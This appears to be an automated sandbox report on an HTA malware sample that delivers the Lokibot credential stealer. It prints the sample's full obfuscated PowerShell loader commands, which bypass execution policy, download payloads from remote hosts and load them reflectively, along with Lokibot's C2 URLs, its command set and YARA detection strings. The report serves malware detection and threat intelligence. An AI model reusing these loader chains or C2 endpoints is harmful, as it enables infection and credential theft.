Edit tour

Windows Analysis Report
kissmegoodthingwhichgivemebestthignswithgirluaremy.hta

Overview

General Information

Sample name:	kissmegoodthingwhichgivemebestthignswithgirluaremy.hta
Analysis ID:	1556631
MD5:	43f15554d66e784d988aa2da3ed2a136
SHA1:	6d0fb362a8aa62a046e25435e6a525e2ca61492d
SHA256:	5c7f1d6ac7671a1b1764dba808cf52f5c5c48ce1cbd0f1c16d8f6cf0afe5d3c8
Tags:	htauser-abuse_ch
Infos:

Detection

Cobalt Strike, HTMLPhisher, Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Cobalt Strike Beacon

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected HtmlPhish44

Yara detected Lokibot

Yara detected Powershell download and execute

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Obfuscated command line found

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected aPLib compressed binary

Compiles C# or VB.Net code

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: AspNetCompiler Execution

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 1264 cmdline: mshta.exe "C:\Users\user\Desktop\kissmegoodthingwhichgivemebestthignswithgirluaremy.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 3160 cmdline: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 2364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 6972 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCA7.tmp" "c:\Users\user\AppData\Local\Temp\glmzcldr\CSCA9586F3AA915453C854280BCC33938CA.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

wscript.exe (PID: 5560 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" MD5: FF00E0480075B095948000BDC66E81F0)

powershell.exe (PID: 5948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

aspnet_compiler.exe (PID: 3092 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.95/simple/five/fre.php"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
kissmegoodthingwhichgivemebestthignswithgirluaremy.hta	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0000000B.00000002.3274760441.0000000001298000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x74640:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x61a0b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x7024f:$des3: 68 03 66 00 00 0x74640:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x7470c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: powershell.exe PID: 5948	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x227c:$b2: ::FromBase64String( 0x20ec8:$b2: ::FromBase64String( 0x21510:$b2: ::FromBase64String( 0x22dc9:$b2: ::FromBase64String( 0x2352b:$b2: ::FromBase64String( 0x23eba:$b2: ::FromBase64String( 0x24587:$b2: ::FromBase64String( 0x2033:$b3: ::UTF8.GetString( 0x8a03:$b3: ::UTF8.GetString( 0xf843:$b3: ::UTF8.GetString( 0x103d9:$b3: ::UTF8.GetString( 0x10f1c:$b3: ::UTF8.GetString( 0x118bd:$b3: ::UTF8.GetString( 0x12228:$b3: ::UTF8.GetString( 0x158c8:$b3: ::UTF8.GetString( 0x16288:$b3: ::UTF8.GetString( 0x16bf4:$b3: ::UTF8.GetString( 0x16dc3:$b3: ::UTF8.GetString( 0x178d1:$b3: ::UTF8.GetString( 0x19b23:$b3: ::UTF8.GetString( 0x1a59d:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 5536	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: powershell.exe PID: 5536	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: powershell.exe PID: 5536	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 5536	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0xa20626:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: powershell.exe PID: 5536	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xb1cee:$b2: ::FromBase64String( 0x654512:$b2: ::FromBase64String( 0x66e2ff:$b2: ::FromBase64String( 0x66e9bb:$b2: ::FromBase64String( 0x66fbfe:$b2: ::FromBase64String( 0x70de49:$b2: ::FromBase64String( 0x70eab0:$b2: ::FromBase64String( 0x710e8f:$b2: ::FromBase64String( 0x750766:$b2: ::FromBase64String( 0x759e87:$b2: ::FromBase64String( 0x75ad88:$b2: ::FromBase64String( 0x7a95b5:$b2: ::FromBase64String( 0x7a9c65:$b2: ::FromBase64String( 0x7ac9fd:$b2: ::FromBase64String( 0x7b3b95:$b2: ::FromBase64String( 0x7b4250:$b2: ::FromBase64String( 0x7d4a68:$b2: ::FromBase64String( 0x7d5124:$b2: ::FromBase64String( 0x9e07be:$b2: ::FromBase64String( 0x9e0e79:$b2: ::FromBase64String( 0xb1aa5:$b3: ::UTF8.GetString(
Process Memory Space: aspnet_compiler.exe PID: 3092	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 3092	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 3092	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 3092	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1e8f:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.powershell.exe.660c250.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.powershell.exe.660c250.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.powershell.exe.660c250.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.powershell.exe.660c250.0.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
9.2.powershell.exe.660c250.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
11.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
11.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
11.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
11.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
11.2.aspnet_compiler.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
11.2.aspnet_compiler.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
11.2.aspnet_compiler.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
9.2.powershell.exe.660c250.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.2.powershell.exe.660c250.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.powershell.exe.660c250.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
